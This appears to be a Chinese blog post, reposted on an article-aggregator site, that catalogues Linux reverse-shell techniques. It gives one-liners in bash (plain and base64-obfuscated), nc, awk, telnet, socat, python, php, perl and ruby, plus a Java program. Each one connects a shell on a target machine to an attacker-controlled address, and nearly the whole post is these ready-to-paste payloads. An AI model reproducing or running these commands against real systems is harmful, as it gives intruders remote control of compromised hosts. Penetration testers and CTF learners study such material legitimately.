linux反弹shell的姿势
程序员文章站
2022-03-09 22:42:51
...
linux反弹shell的姿势
文章目录
一、bash反弹
bash -i >& /dev/tcp/192.168.1.121/1234 0>&1
base64版:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTIxLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
二、nc反弹
nc -e /bin/bash 192.168.1.121 1234
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QPhh4oTc-1599481674930)(F:\安全学习\内网渗透\反弹shell\nc.jpg)]
三、awk反弹
awk 'BEGIN{s="/inet/tcp/0/192.168.1.121/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
四、telnet反弹
需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。
telnet 192.168.1.121 1234 | /bin/bash | telnet 192.168.1.121 4321
五、socat反弹
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.121:1234
六、python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.121',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
七、php
php -r '$sock=fsockopen("192.168.1.121",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yt8ht7Tj-1599481674955)(F:\安全学习\内网渗透\反弹shell\php.jpg)]
八、perl
perl -e 'use Socket;$i="192.168.1.121";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
九、ruby反弹
ruby -rsocket -e'f=TCPSocket.open("192.168.1.121",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
十、Java反弹
public class Revs {
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.121/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
编译Java文件,然后再目标机上执行,反弹shell
参考文章:https://mp.weixin.qq.com/s/uXnPctlOBmciHM4Q-7oquw
上一篇: 栈溢出例子理解
下一篇: cgpwn2(xctf)